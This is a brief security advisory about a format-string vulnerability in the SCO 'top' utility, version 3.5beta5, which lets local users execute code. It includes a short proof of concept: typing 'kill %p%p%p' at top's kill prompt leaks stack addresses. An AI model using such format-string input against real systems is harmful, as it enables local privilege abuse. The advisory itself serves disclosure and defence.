|
|
|
|
| |
| The SCO 'top' utility contains a security vulnerability that allows local attackers to cause it to execute arbitrary code. |
| |
Credit:
The information has been provided by KF.
|
| |
Vulnerable systems:
top version 3.5beta5
The 'top' utility suffers from a security vulnerability due to incorrect parsing of format strings. This allows local attackers to execute code on the machine.
Example:
Type k for kill while in top.
last pid: 1926; load averages: 0.00, 0.02, 0.00 10:22:44
111 processes: 110 sleeping, 1 onproc
CPU states: % idle, % user, % system, % wait, % sxbrk
Memory: 384M phys, 357M max, 272M free, 352M locked, 190M unlocked, 125M swap
kill %p%p%p
last pid: 1930; load averages: 0.00, 0.02, 0.00 10:23:23
111 processes: 110 sleeping, 1 onproc
CPU states: % idle, % user, % system, % wait, % sxbrk
Memory: 384M phys, 357M max, 272M free, 352M locked, 190M unlocked, 125M swap
8005b3608059e1008047ce024: Not a number
|
|
|
|
|